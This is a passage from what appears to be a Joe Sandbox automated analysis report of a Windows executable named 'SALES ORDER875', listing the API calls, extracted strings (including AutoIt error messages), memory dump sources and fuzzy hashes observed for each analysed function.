                                                                                                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004134BA
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LengthMessageSendTextWindow
                                                                                                                                                                                    • String ID: edit
                                                                                                                                                                                    • API String ID: 2978978980-2167791130
                                                                                                                                                                                    • Opcode ID: 80deb508af40e54529474cb91856caf8ac218acde1afa924d9cc3a7484889421
                                                                                                                                                                                    • Instruction ID: 202bb549b8e27a4c7e273278fd140df1e86cfcc1806bac9bb23fa8f08bfb30c0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 80deb508af40e54529474cb91856caf8ac218acde1afa924d9cc3a7484889421
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0111C171100208AFEF228E64DC80AFB376AEF14379F504325F965932E0C739EC919B58
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00389CB3: _wcslen.LIBCMT ref: 00389CBD
                                                                                                                                                                                    • CharUpperBuffW.USER32(?,?,?), ref: 003E6CB6
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 003E6CC2
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                    • String ID: STOP
                                                                                                                                                                                    • API String ID: 1256254125-2411985666
                                                                                                                                                                                    • Opcode ID: 019935cc1c24054dbda8ad2e44c5ad218e01e6cdd8bc7135f539ceb0d389f84c
                                                                                                                                                                                    • Instruction ID: c5741c48f5b043428aa34dcef31bbab15bf7658d8d0a52bb2dfd4f1cf796011a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 019935cc1c24054dbda8ad2e44c5ad218e01e6cdd8bc7135f539ceb0d389f84c
                                                                                                                                                                                    • Instruction Fuzzy Hash: FF0104326009768BCB22AFBECC829BF73B9FA717907510639E852961D5EB31D800C750
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00389CB3: _wcslen.LIBCMT ref: 00389CBD
                                                                                                                                                                                      • Part of subcall function 003E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 003E3CCA
                                                                                                                                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 003E1D4C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                    • API String ID: 624084870-1403004172
                                                                                                                                                                                    • Opcode ID: 29be490ea1c63224a5d5125a52fc2b4ed803f359f6f5cd779d71b4fcbc872ff6
                                                                                                                                                                                    • Instruction ID: 23769d926abdeb52e709dbd36be6caed34ab4d5834e2822a6a513593ca7a73af
                                                                                                                                                                                    • Opcode Fuzzy Hash: 29be490ea1c63224a5d5125a52fc2b4ed803f359f6f5cd779d71b4fcbc872ff6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B01D871641268ABCB06FBA5CC55EFF7368EB46350B14075AF8326B2C1EA3159088760
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00389CB3: _wcslen.LIBCMT ref: 00389CBD
                                                                                                                                                                                      • Part of subcall function 003E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 003E3CCA
                                                                                                                                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 003E1C46
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                    • API String ID: 624084870-1403004172
                                                                                                                                                                                    • Opcode ID: f6c9cde476b32f0da628946f8fe12984ca18ecb7521abfce06b50d3ce243e80e
                                                                                                                                                                                    • Instruction ID: 09fe345c40b7d513a680afc58b72cb633bf5f20495dc030a2004a8dc3eada5eb
                                                                                                                                                                                    • Opcode Fuzzy Hash: f6c9cde476b32f0da628946f8fe12984ca18ecb7521abfce06b50d3ce243e80e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7101F7717812546BCF06FB91C955BFF73A89B11340F24015AB406BB2C2EA319E08C7B1
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00389CB3: _wcslen.LIBCMT ref: 00389CBD
                                                                                                                                                                                      • Part of subcall function 003E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 003E3CCA
                                                                                                                                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 003E1CC8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                    • API String ID: 624084870-1403004172
                                                                                                                                                                                    • Opcode ID: 1f538925296e0873dcc988d5e7210b9b7f77aa03504f7e5ac9ebe545b4ef4ece
                                                                                                                                                                                    • Instruction ID: 3d54740aea62da5f2025285c80cfe9998c4b482a7ba9efeec057520935071212
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1f538925296e0873dcc988d5e7210b9b7f77aa03504f7e5ac9ebe545b4ef4ece
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E01D6716812A8A7DF06FBA1CA05BFE73AC9B11340F340156B802B72C2EA319F08C771
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 0039A529
                                                                                                                                                                                      • Part of subcall function 00389CB3: _wcslen.LIBCMT ref: 00389CBD
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Init_thread_footer_wcslen
                                                                                                                                                                                    • String ID: ,%E$3y=
                                                                                                                                                                                    • API String ID: 2551934079-4260045348
                                                                                                                                                                                    • Opcode ID: accaafbe889baa8e32dfab05e021da3284e6b16a6990641e9c138d0fc58ed913
                                                                                                                                                                                    • Instruction ID: 88352f45f8dc70d243d32038db38ace8fb111bb50c459a76fb7f22efa40f7a8c
                                                                                                                                                                                    • Opcode Fuzzy Hash: accaafbe889baa8e32dfab05e021da3284e6b16a6990641e9c138d0fc58ed913
                                                                                                                                                                                    • Instruction Fuzzy Hash: 22012F32B00A149BCA07F368980ABBD3368CB06711F4101AAF5022B2C3EE509D0186CB
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00453018,0045305C), ref: 004181BF
                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 004181D1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                                                                                                    • String ID: \0E
                                                                                                                                                                                    • API String ID: 3712363035-1125616938
                                                                                                                                                                                    • Opcode ID: 262a207709de922d9299519dc70b4d870354f6061c76906a208a40b266e64454
                                                                                                                                                                                    • Instruction ID: cbb9b373d9c29281c67057dee88cfe61fa29cbec9accb392fc2c252d689ad16b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 262a207709de922d9299519dc70b4d870354f6061c76906a208a40b266e64454
                                                                                                                                                                                    • Instruction Fuzzy Hash: B2F05EB1640304BAE6216F65AC45FB73A5CDB06B93F004431BF08D91E3D679CE1482BC
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcslen
                                                                                                                                                                                    • String ID: 3, 3, 16, 1
                                                                                                                                                                                    • API String ID: 176396367-3042988571
                                                                                                                                                                                    • Opcode ID: 4e989f8a79ff58a2881f383b1240afdb8dfd95430e31c633a9264aa8b2970e72
                                                                                                                                                                                    • Instruction ID: 795ecd68a6e57131e5c80ef36cc74372c5def6aa5a339e012547ff634eb898c6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e989f8a79ff58a2881f383b1240afdb8dfd95430e31c633a9264aa8b2970e72
                                                                                                                                                                                    • Instruction Fuzzy Hash: 39E02B02A1426010D232167A9CC1A7F968DCFC6790710183FF981D63A6EBEC9DA293A6
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 003E0B23
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Message
                                                                                                                                                                                    • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                    • API String ID: 2030045667-4017498283
                                                                                                                                                                                    • Opcode ID: 6db10fd4867148e81de0675b1324add4735e4e1427752b8415567343d542ec18
                                                                                                                                                                                    • Instruction ID: 2ecd3ed0155c971466b9b3f71d0ff5599cd736c0020db3f1159bbac9c6d711f3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6db10fd4867148e81de0675b1324add4735e4e1427752b8415567343d542ec18
                                                                                                                                                                                    • Instruction Fuzzy Hash: A7E0D8312843182BD61536947C43FC97B848F06F10F204427F758994C38BD1649006ED
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0039F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,003A0D71,?,?,?,0038100A), ref: 0039F7CE
                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,0038100A), ref: 003A0D75
                                                                                                                                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0038100A), ref: 003A0D84
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 003A0D7F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                    • API String ID: 55579361-631824599
                                                                                                                                                                                    • Opcode ID: 1b222adf3c2a953d17958891d09195d1fa98b3b853288675cd0899f5e401d3f0
                                                                                                                                                                                    • Instruction ID: 2d8a36592aa744e7ed4c5c0a44401a458b9597dccf2fd8ed24965640410ab893
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b222adf3c2a953d17958891d09195d1fa98b3b853288675cd0899f5e401d3f0
                                                                                                                                                                                    • Instruction Fuzzy Hash: DFE092746007018FD3759FB8D9483827BE0EF01780F00897DE486CA661DBF4E4888B91
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 0039E3D5
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Init_thread_footer
                                                                                                                                                                                    • String ID: 0%E$8%E
                                                                                                                                                                                    • API String ID: 1385522511-420532265
                                                                                                                                                                                    • Opcode ID: e7b5e10a98e2e04c32e51fc020f6af2faa409e677b1720102b60840b88b19e8c
                                                                                                                                                                                    • Instruction ID: 0b27e369e5e596ba7ec3452872ad050795803aa45c4cb11e18a7b4ab0df72bae
                                                                                                                                                                                    • Opcode Fuzzy Hash: e7b5e10a98e2e04c32e51fc020f6af2faa409e677b1720102b60840b88b19e8c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0EE0263A400B18EBCE0ADF18FAD4A8A3355EB27321B910177E4028F1D3BBB46881864C
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 003F302F
                                                                                                                                                                                    • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 003F3044
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Temp$FileNamePath
                                                                                                                                                                                    • String ID: aut
                                                                                                                                                                                    • API String ID: 3285503233-3010740371
                                                                                                                                                                                    • Opcode ID: 0169c06cb51746bf0eb98718fb727acd92bb358d2f6f708d6e0f30bf26b41623
                                                                                                                                                                                    • Instruction ID: 4dcfe147b6066fab79b1944c2efd8c578523fc7b0cabd85a25f639272737998f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0169c06cb51746bf0eb98718fb727acd92bb358d2f6f708d6e0f30bf26b41623
                                                                                                                                                                                    • Instruction Fuzzy Hash: B8D05EB294032867DA20A7A4EC4EFCB3A6CDB05750F0002A2B655E2091DAF49984CAD4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LocalTime
                                                                                                                                                                                    • String ID: %.3d$X64
                                                                                                                                                                                    • API String ID: 481472006-1077770165
                                                                                                                                                                                    • Opcode ID: dfae6b8cc9250001b1e5b42058302656fb9a34735fcc469d215ac0e39e6705c4
                                                                                                                                                                                    • Instruction ID: 6286c1c9e9677eccce95e7a22e89ed7f037ce6d453b8f525334f54194aca3a8b
                                                                                                                                                                                    • Opcode Fuzzy Hash: dfae6b8cc9250001b1e5b42058302656fb9a34735fcc469d215ac0e39e6705c4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 26D012A2C48108EACF519AE0EC459F9B37CBB18341F608863F806D1940D734C509A761
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0041236C
                                                                                                                                                                                    • PostMessageW.USER32(00000000), ref: 00412373
                                                                                                                                                                                      • Part of subcall function 003EE97B: Sleep.KERNEL32 ref: 003EE9F3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                                                                                    • API String ID: 529655941-2988720461
                                                                                                                                                                                    • Opcode ID: 265eb666f130ec337b4b82e0889622845168b7419dbbb366bb23664c2b529bcb
                                                                                                                                                                                    • Instruction ID: 0ae5270261f7bd28d988be075d95a887f219a8fd04b53e6b2fbc42f7da611442
                                                                                                                                                                                    • Opcode Fuzzy Hash: 265eb666f130ec337b4b82e0889622845168b7419dbbb366bb23664c2b529bcb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 17D0A9323C0320BAE264A370DC4FFC6A6049B00B00F008A227201AA0D0C9A4A800CA08
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0041232C
                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0041233F
                                                                                                                                                                                      • Part of subcall function 003EE97B: Sleep.KERNEL32 ref: 003EE9F3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                                                                                    • API String ID: 529655941-2988720461
                                                                                                                                                                                    • Opcode ID: df964a6ae03d320917164f36ad1469b1b00249de1cca35fc41fb53ba6734847a
                                                                                                                                                                                    • Instruction ID: 5803ec35ba66d928dc0ad280133552b2fec432dd136a6d1cb2c3ee7a341d0f35
                                                                                                                                                                                    • Opcode Fuzzy Hash: df964a6ae03d320917164f36ad1469b1b00249de1cca35fc41fb53ba6734847a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6FD022323C0320BBE264B370DC4FFC6BA049B00B00F008A227305AA0D0C9F4A800CA08